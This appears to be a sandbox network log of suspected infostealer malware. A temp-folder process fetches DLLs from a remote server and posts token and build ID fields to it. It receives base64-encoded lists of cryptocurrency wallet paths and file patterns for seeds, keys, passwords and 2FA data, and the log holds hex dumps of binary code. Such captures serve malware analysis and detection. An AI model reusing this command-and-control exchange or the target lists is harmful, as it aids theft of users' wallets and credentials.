2024-05-26 08:31:30 UTC	16384	IN	Data Raw: 14 90 03 10 31 e8 89 45 f0 ff 75 08 e8 35 ab 00 00 83 c4 04 85 c0 74 5f 89 c6 8b 78 38 bb 91 00 00 00 85 ff 74 56 83 3f 03 75 51 8b 4d 18 8b 47 04 83 7d 14 00 74 59 8b 5d 0c 85 c0 74 64 89 ce 8b 4d 08 89 da 6a 03 ff 75 10 e8 47 fa ff ff 83 c4 08 89 c3 85 c0 75 24 56 ff 75 14 ff 75 08 e8 72 fd ff ff 83 c4 0c 89 c6 8b 4d f0 31 e9 e8 a3 8b 01 00 89 f0 eb 11 bb b3 00 00 00 8b 4d f0 31 e9 e8 90 8b 01 00 89 d8 83 c4 10 5e 5f 5b 5d c3 85 c0 74 06 83 7f 68 00 74 5a 81 c7 90 00 00 00 eb 55 8b 01 89 45 e8 8b 47 64 89 45 e4 8b 4f 74 ff 15 00 a0 03 10 8d 45 ec ff 75 10 53 ff 75 e8 50 ff 75 14 ff 75 e4 ff d1 83 c4 18 85 c0 74 32 e8 a1 8d 01 00 50 e8 eb 84 00 00 83 c4 04 8b 55 ec 8b 4d 18 89 11 bb 50 01 00 00 3d 50 01 00 00 74 8a eb 18 83 c7 60 8b 07 89 01 31 db e9 7a Data Ascii: 1Eu5t_x8tV?uQMG}tY]tdMjuGu$VuurM1M1^_[]thtZUEGdEOtEuSuPuut2PUMP=Pt`1z
2024-05-26 08:31:30 UTC	16384	IN	Data Raw: d8 00 00 00 00 c7 45 d4 04 00 00 00 eb 18 0f 1f 84 00 00 00 00 00 8b 47 fc 8b 00 89 45 d8 83 c7 0c 83 c6 ff 74 5a 8b 47 f8 85 c0 74 19 3d 61 01 00 00 74 e2 8b 4f fc eb 15 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 8b 4f fc 8b 11 89 55 d4 ff 37 51 50 ff 75 dc e8 8c 53 00 00 83 c4 10 85 c0 74 bd 89 c3 e9 80 01 00 00 bf 02 00 00 00 e9 83 01 00 00 c7 45 d4 04 00 00 00 c7 45 d8 00 00 00 00 8b 45 10 8b 4d 0c 83 ec 1c 0f 28 05 40 fb 02 10 0f 11 44 24 0c 89 44 24 08 89 4c 24 04 8b 45 08 89 04 24 e8 fe 7c ff ff 83 c4 1c 85 c0 74 0c 89 c3 ff 75 dc e8 7d 5a 00 00 eb 3d 8b 7d 18 8b 5d 14 57 e8 8b 4d 01 00 83 c4 04 89 c6 89 7d ec 8d 45 ec 50 56 57 53 ff 75 08 e8 e8 9a ff ff 83 c4 14 85 c0 74 26 89 c3 ff 75 dc e8 47 5a 00 00 83 c4 04 56 e8 78 4d 01 00 83 c4 04 83 fb 40 bf Data Ascii: EGEtZGt=atOf.OU7QPuStEEEM(@D$D$L$E$\|tu}Z=}]WM}EPVWSut&uGZVxM@
2024-05-26 08:31:30 UTC	16384	IN	Data Raw: 8b 48 38 b8 91 00 00 00 85 c9 74 4a 83 39 02 75 45 83 79 04 00 74 3f 8b 55 0c 8b 59 6c 83 c3 08 89 1f 31 c0 85 d2 74 2e b8 50 01 00 00 39 de 72 25 8b 01 89 02 8b 41 70 89 42 04 83 c2 08 ff 71 6c ff 71 64 52 e8 cc 0f 01 00 83 c4 0c 31 c0 eb 05 b8 b3 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 7d 10 a1 14 90 03 10 31 e8 89 45 f0 85 ff 0f 84 2d 01 00 00 8b 5d 0c 8b 33 ff 75 08 e8 b5 2a 00 00 83 c4 04 b9 b3 00 00 00 85 c0 0f 84 12 01 00 00 83 fe 0a 0f 87 f7 00 00 00 b9 78 06 00 00 0f a3 f1 73 12 8d 48 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 b9 83 01 00 00 0f a3 f1 73 e4 8d 48 34 8b 09 83 fe 0a 77 2f ba 78 06 00 00 0f a3 f2 73 12 83 c0 38 eb 1a 66 2e 0f 1f 84 00 00 00 00 00 0f 1f 00 ba 83 01 00 00 0f a3 f2 73 Data Ascii: H8tJ9uEyt?UYl1t.P9r%ApBqlqdR1^_[]USWV}1E-]3u*xsH8f.sH4w/xs8f.s
2024-05-26 08:31:30 UTC	16384	IN	Data Raw: cc cc cc cc cc cc 55 89 e5 53 57 56 ff 75 08 e8 c2 d8 ff ff 83 c4 04 85 c0 0f 84 9c 03 00 00 89 c6 c7 40 24 00 00 00 00 bf 02 00 00 00 83 78 0c 00 0f 88 54 03 00 00 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 8b 46 34 8b 5e 40 8d 4b 01 89 4e 40 50 ff 15 10 7c 03 10 83 c4 04 83 fb 2c 0f 8f 29 03 00 00 6b c3 54 8d 0c 06 83 c1 64 89 4c 06 5c c7 44 06 64 57 43 53 ce c7 44 06 60 04 00 00 00 c7 44 06 58 00 00 00 00 c7 44 06 54 00 00 00 00 0f 57 c0 0f 11 44 06 44 83 7e 0c 00 0f 88 ea 02 00 00 8d 1c 06 83 c3 44 ff 76 34 ff 15 f0 7b 03 10 83 c4 04 69 4b 10 c5 90 c6 6a 8b 86 0c 0f 00 00 83 c0 ff 21 c8 8b 8c 86 10 0f 00 00 89 0b c7 43 04 00 00 00 00 8b 8c 86 10 0f 00 00 85 c9 74 03 89 59 04 89 9c 86 10 0f 00 00 ff 76 34 ff 15 10 7c 03 10 83 c4 04 83 7e 0c 00 0f 88 8b 02 00 Data Ascii: USWVu@$xTv4{F4^@KN@P\|,)kTdL\DdWCSD`DXDTWDD~Dv4{iKj!CtYv4\|~
2024-05-26 08:31:30 UTC	16384	IN	Data Raw: 00 89 f8 81 c4 3c 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 89 d6 89 cf 8b 5d 08 8b 4b 24 ff 15 00 a0 03 10 ff 75 14 ff 75 10 ff 75 0c 53 ff d1 83 c4 10 85 c0 75 1e 31 c0 39 5e 34 0f 94 c0 89 f9 89 f2 ff 75 14 ff 75 10 ff 75 0c 50 e8 1c 2b 00 00 83 c4 10 5e 5f 5b 5d c3 cc cc cc cc 55 89 e5 53 57 56 83 ec 10 8b 45 08 8b 0d 14 90 03 10 31 e9 89 4d f0 c7 45 ec 00 00 00 00 85 c0 74 63 8b 75 10 8b 58 34 85 db 74 5d 85 f6 74 5f 8b 4d 0c 8d 45 e8 8d 7d ec 89 f2 50 57 e8 8e 00 00 00 83 c4 08 85 c0 74 60 89 c7 8b 45 ec 89 45 e4 8b 4b 14 ff 15 00 a0 03 10 ff 75 14 56 57 53 8b 5d e4 ff d1 83 c4 10 89 c6 85 db 74 40 57 e8 96 8d 00 00 83 c4 04 ff 75 e8 53 e8 b4 8d 00 00 83 c4 08 eb 29 31 f6 eb 25 8b 18 85 f6 75 a1 8b 4b 14 ff 15 00 a0 03 10 ff Data Ascii: <^_[]USWV]K$uuuSu19^4uuuP+^_[]USWVE1MEtcuX4t]t_ME}PWt`EEKuVWS]t@WuS)1%uK

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49764	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:31 UTC	178	OUT	GET /vcruntime140.dll HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Cache-Control: no-cache
2024-05-26 08:31:31 UTC	245	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:31 GMT Content-Type: application/octet-stream Content-Length: 80880 Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT Connection: close ETag: "6315a9f4-13bf0" Accept-Ranges: bytes
2024-05-26 08:31:31 UTC	16139	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"
2024-05-26 08:31:31 UTC	16384	IN	Data Raw: ff ff eb 1e 0f b6 4e 03 0f b6 42 03 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 6f 05 00 00 8b 46 04 3b 42 04 74 4f 0f b6 f8 0f b6 42 04 2b f8 75 18 0f b6 7e 05 0f b6 42 05 2b f8 75 0c 0f b6 7e 06 0f b6 42 06 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 07 0f b6 42 07 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 0e 05 00 00 8b 46 08 3b 42 08 74 4f 0f b6 f8 0f b6 42 08 2b f8 75 18 0f b6 7e 09 0f b6 42 09 2b f8 75 0c 0f b6 7e 0a 0f b6 42 0a 2b f8 74 10 33 c9 85 ff 0f 9f c1 8d 0c 4d ff ff ff ff eb 1e 0f b6 4e 0b 0f b6 42 0b 2b c8 74 12 33 c0 85 c9 0f 9f c0 8d 0c 45 ff ff ff ff eb 02 33 c9 85 c9 0f 85 ad 04 00 00 8b 46 0c 3b 42 0c 74 4f 0f b6 f8 0f b6 42 0c 2b f8 75 18 Data Ascii: NB+t3E3oF;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u~B+u~B+t3MNB+t3E3F;BtOB+u
2024-05-26 08:31:31 UTC	16384	IN	Data Raw: 08 00 00 59 6a 28 8d 4d 80 8b f0 e8 67 f3 ff ff 56 8d 4d f0 51 8b c8 e8 0a f7 ff ff 6a 29 8d 85 70 ff ff ff 50 8d 4d f0 e8 1b f7 ff ff 50 8d 4d f8 e8 78 f7 ff ff 81 7d dc 00 08 00 00 75 1a 8b c3 25 00 07 00 00 3d 00 02 00 00 74 0c 8d 45 98 50 8d 4d f8 e8 55 f7 ff ff a1 98 f2 00 10 c1 e8 13 f7 d0 a8 01 8d 45 cc 50 74 11 e8 92 2e 00 00 59 50 8d 4d f8 e8 34 f7 ff ff eb 0f e8 81 2e 00 00 59 50 8d 4d f8 e8 9f f8 ff ff 8d 45 cc 50 e8 69 23 00 00 59 50 8d 4d f8 e8 10 f7 ff ff a1 98 f2 00 10 c1 e8 08 f7 d0 a8 01 8d 45 cc 50 74 11 e8 30 3e 00 00 59 50 8d 4d f8 e8 ef f6 ff ff eb 0f e8 1f 3e 00 00 59 50 8d 4d f8 e8 5a f8 ff ff 8d 45 cc 50 e8 6a 19 00 00 59 50 8d 4d f8 e8 47 f8 ff ff a1 98 f2 00 10 c1 e8 02 f7 d0 a8 01 74 20 85 ff 74 1c 8b 45 f8 89 07 8b 45 fc 89 47 Data Ascii: Yj(MgVMQj)pPMPMx}u%=tEPMUEPt.YPM4.YPMEPi#YPMEPt0>YPM>YPMZEPjYPMGt tEEG
2024-05-26 08:31:31 UTC	16384	IN	Data Raw: 0f 83 fa 10 74 15 b8 ff ff 00 00 e9 f7 01 00 00 81 c9 80 00 00 00 eb 03 83 c9 40 83 e0 06 2b c7 0f 84 df 01 00 00 2b c6 74 1e 2b c6 74 0f 2b c6 75 d4 81 c9 00 04 00 00 e9 c8 01 00 00 81 c9 00 01 00 00 e9 bd 01 00 00 81 c9 00 02 00 00 e9 b2 01 00 00 2b c6 75 af 8d 51 01 89 15 90 f2 00 10 8a 02 3c 30 7c 2a 3c 39 7f 26 0f be c0 83 c2 d1 03 c2 a3 90 f2 00 10 e8 8c fe ff ff 0d 00 00 01 00 e9 81 01 00 00 b8 fe ff 00 00 e9 77 01 00 00 b9 ff ff 00 00 e9 dc 00 00 00 83 f8 2f 0f 8e 63 ff ff ff 8b f2 83 f8 35 7e 62 83 f8 41 0f 85 53 ff ff ff 81 c9 00 90 00 00 e9 b8 00 00 00 b9 fe ff 00 00 4a e9 ad 00 00 00 81 c9 00 98 00 00 e9 a2 00 00 00 83 e8 43 0f 84 94 00 00 00 83 e8 01 0f 84 83 00 00 00 83 e8 01 74 76 83 e8 0d 0f 85 12 ff ff ff 42 89 15 90 f2 00 10 8b f2 8a 0a Data Ascii: t@++t+t+u+uQ<0\|*<9&w/c5~bASJCtvB
2024-05-26 08:31:31 UTC	15589	IN	Data Raw: ae e8 7c cd cc c1 be ea d2 ff 35 4e c0 ce b5 7a ad bb a6 bb 2e dc 94 e9 f3 1e 7d e0 ec 28 a3 07 82 66 5a c3 5b 5a cb ec 03 c9 e3 2c 94 15 21 2b a0 f9 d9 9b 4b e7 b6 de eb 20 51 8c 3e fa 2c 23 d5 18 b0 f0 b1 a0 70 6c 7a ef 8b 83 48 a6 3a 02 06 ef a0 8a 2c b7 88 45 30 82 05 ff 30 82 03 e7 a0 03 02 01 02 02 13 33 00 00 01 51 9e 8d 8f 40 71 a3 0e 41 00 00 00 00 01 51 30 0d 06 09 2a 86 48 86 f7 0d 01 01 0b 05 00 30 7e 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 13 30 11 06 03 55 04 08 13 0a 57 61 73 68 69 6e 67 74 6f 6e 31 10 30 0e 06 03 55 04 07 13 07 52 65 64 6d 6f 6e 64 31 1e 30 1c 06 03 55 04 0a 13 15 4d 69 63 72 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 31 28 30 26 06 03 55 04 03 13 1f 4d 69 63 72 6f 73 6f 66 74 20 43 6f 64 65 20 53 69 67 6e 69 6e Data Ascii: \|5Nz.}(fZ[Z,!+K Q>,#plzH:,E003Q@qAQ0*H0~10UUS10UWashington10URedmond10UMicrosoft Corporation1(0&UMicrosoft Code Signin

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49765	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:35 UTC	279	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----CAAEBKEGHJKEBFHJDBFC User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 1145 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:35 UTC	1145	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 43 41 41 45 42 4b 45 47 48 4a 4b 45 42 46 48 4a 44 42 46 43 0d 0a 43 6f 6e 74 Data Ascii: ------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------CAAEBKEGHJKEBFHJDBFCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------CAAEBKEGHJKEBFHJDBFCCont
2024-05-26 08:31:36 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:36 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:36 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49766	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:36 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----KKFHJDAEHIEHJJKFBGDA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:36 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4b 4b 46 48 4a 44 41 45 48 49 45 48 4a 4a 4b 46 42 47 44 41 0d 0a 43 6f 6e 74 Data Ascii: ------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------KKFHJDAEHIEHJJKFBGDAContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------KKFHJDAEHIEHJJKFBGDACont
2024-05-26 08:31:37 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:37 UTC	2228	IN	Data Raw: 38 61 38 0d 0a 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 Data Ascii: 8a8Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZG

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.5	49767	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:38 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIDAFHDHCBGDGCBGCGII User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:38 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 48 49 44 41 46 48 44 48 43 42 47 44 47 43 42 47 43 47 49 49 0d 0a 43 6f 6e 74 Data Ascii: ------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------HIDAFHDHCBGDGCBGCGIIContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------HIDAFHDHCBGDGCBGCGIICont
2024-05-26 08:31:39 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:39 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:39 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.5	49768	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:40 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEGHCFIDAKJEBGCAFBAE User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 331 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:40 UTC	331	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 41 45 47 48 43 46 49 44 41 4b 4a 45 42 47 43 41 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 43 46 49 44 41 4b 4a 45 42 47 43 41 46 42 41 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 45 47 48 43 46 49 44 41 4b 4a 45 42 47 43 41 46 42 41 45 0d 0a 43 6f 6e 74 Data Ascii: ------AEGHCFIDAKJEBGCAFBAEContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------AEGHCFIDAKJEBGCAFBAEContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------AEGHCFIDAKJEBGCAFBAECont
2024-05-26 08:31:41 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sun, 26 May 2024 08:31:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-26 08:31:41 UTC	1524	IN	Data Raw: 35 65 38 0d 0a 52 45 56 54 53 31 52 50 55 48 77 6c 52 45 56 54 53 31 52 50 55 43 56 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 69 6f 73 4b 6e 4e 6c 5a 57 51 71 4c 69 6f 73 4b 6d 4a 30 59 79 6f 75 4b 69 77 71 61 32 56 35 4b 69 34 71 4c 43 6f 79 5a 6d 45 71 4c 69 6f 73 4b 6d 4e 79 65 58 42 30 62 79 6f 75 4b 69 77 71 59 32 39 70 62 69 6f 75 4b 69 77 71 63 48 4a 70 64 6d 46 30 5a 53 6f 75 4b 69 77 71 4d 6d 5a 68 4b 69 34 71 4c 43 70 68 64 58 52 6f 4b 69 34 71 4c 43 70 73 5a 57 52 6e 5a 58 49 71 4c 69 6f 73 4b 6e 52 79 5a 58 70 76 63 69 6f 75 4b 69 77 71 63 47 46 7a 63 79 6f 75 4b 69 77 71 64 32 46 73 4b 69 34 71 4c 43 70 31 63 47 4a 70 64 43 6f 75 4b 69 77 71 59 6d 4e 6c 65 43 6f 75 4b 69 77 71 59 6d 6c 30 61 47 6c 74 59 69 6f 75 4b 69 77 71 61 47 6c 30 59 6e Data Ascii: 5e8REVTS1RPUHwlREVTS1RPUCVcfCp3YWxsZXQqLiosKnNlZWQqLiosKmJ0YyouKiwqa2V5Ki4qLCoyZmEqLiosKmNyeXB0byouKiwqY29pbiouKiwqcHJpdmF0ZSouKiwqMmZhKi4qLCphdXRoKi4qLCpsZWRnZXIqLiosKnRyZXpvciouKiwqcGFzcyouKiwqd2FsKi4qLCp1cGJpdCouKiwqYmNleCouKiwqYml0aGltYiouKiwqaGl0Yn

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.5	49769	65.109.242.59	443	6716	C:\Users\user\AppData\Local\Temp\kat2225.tmp

Timestamp	Bytes transferred	Direction	Data
2024-05-26 08:31:42 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----BAFCGIJDAFBKFIECBGCA User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 453 Connection: Keep-Alive Cache-Control: no-cache
2024-05-26 08:31:42 UTC	453	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 30 35 37 64 32 37 38 32 30 62 30 37 39 63 62 61 33 64 66 61 61 63 63 38 64 63 62 34 61 61 66 30 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 42 41 46 43 47 49 4a 44 41 46 42 4b 46 49 45 43 42 47 43 41 0d 0a 43 6f 6e 74 Data Ascii: ------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="token"057d27820b079cba3dfaacc8dcb4aaf0------BAFCGIJDAFBKFIECBGCAContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------BAFCGIJDAFBKFIECBGCACont
